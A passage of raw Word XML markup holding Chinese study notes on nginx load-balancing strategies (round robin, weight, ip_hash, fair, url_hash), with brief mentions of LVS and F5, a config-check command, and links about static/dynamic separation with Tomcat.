          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>down</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>掉，能自动剔除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="345"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>weight </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="005A4CD2" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="345"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>指定</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>轮询几率</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>weight</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>和访问比率成正比，用于</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>后端服务器性能不均</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的情况。</w:t>
      </w:r>
      <w:r w:rsidR="00F37684" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="345"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip_hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>值既与</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有关又与后端机器的数量有关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>每个请求按访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>结果分配，这样每个访客固定访问一个后端服务器，可以解决</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>fair</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（第三方）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>按后端服务器的响应时间来分配请求，响应时间短的优先分配。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>fair</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>策略是扩展策略，默认不被编译进</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="2C2C2C"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>内核。其原理是根据后端服务器的响应时间判断负载情况，从中选出负载最轻的机器进行分流。这种策略具有很强的自适应性，但是实际的网络环境往往不是那么简单，因此要慎用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>url_hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（第三方）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74803" w:rsidRPr="00F41A4C" w:rsidRDefault="00B74803" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>其他的负载均衡设备</w:t>
      </w:r>
      <w:r w:rsidR="00725026" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F37684" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>LVS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008770B5" w:rsidRPr="00F41A4C" w:rsidRDefault="00F37684" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>硬件有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>F5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002972A1" w:rsidRPr="00F41A4C" w:rsidRDefault="002972A1" w:rsidP="00DD363C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA3EB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE7992" w:rsidP="00EE7992">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:t>6.8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r w:rsidR="00DA3EB1" w:rsidRPr="00F41A4C">
        <w:t>负载均衡实际例子</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096698A" w:rsidRPr="00F41A4C" w:rsidRDefault="0096698A" w:rsidP="00B74803">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>配置是否正确</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, nginx –t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096698A" w:rsidRPr="00F41A4C" w:rsidRDefault="0096698A" w:rsidP="00B74803">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002972A1" w:rsidRPr="00F41A4C" w:rsidRDefault="004A5B05" w:rsidP="00B74803">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>动静分离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A5B05" w:rsidRPr="00F41A4C" w:rsidRDefault="00E05284" w:rsidP="00B74803">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:hyperlink r:id="rId248" w:history="1">
        <w:r w:rsidR="00C75D29" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/bjash/article/details/8596538</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C75D29" w:rsidRPr="00F41A4C" w:rsidRDefault="00C75D29" w:rsidP="00B74803">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A5B05" w:rsidRPr="00F41A4C" w:rsidRDefault="004A5B05" w:rsidP="00B74803">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00057204" w:rsidRPr="001F3BDA" w:rsidRDefault="004A5B05" w:rsidP="00057204">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>负载均衡</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00057204" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="001F3BDA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4458"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId249" w:history="1">
        <w:r w:rsidR="003C5CB8" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://aijuans.iteye.com/blog/2154373</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001F3BDA">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C5CB8" w:rsidRDefault="001F3BDA" w:rsidP="0096698A">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在高并发环境下处理动态请求时性能很低，而在处理静态页面更加脆弱。虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的最新版本支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>epoll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但是通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>来处理静态页面要比通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>处理在性能方面好很多。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F3BDA" w:rsidRPr="00F41A4C" w:rsidRDefault="001F3BDA" w:rsidP="0096698A">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C5CB8" w:rsidRPr="00F41A4C" w:rsidRDefault="003C5CB8" w:rsidP="0096698A">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C5CB8" w:rsidRPr="00F41A4C" w:rsidRDefault="003C5CB8" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
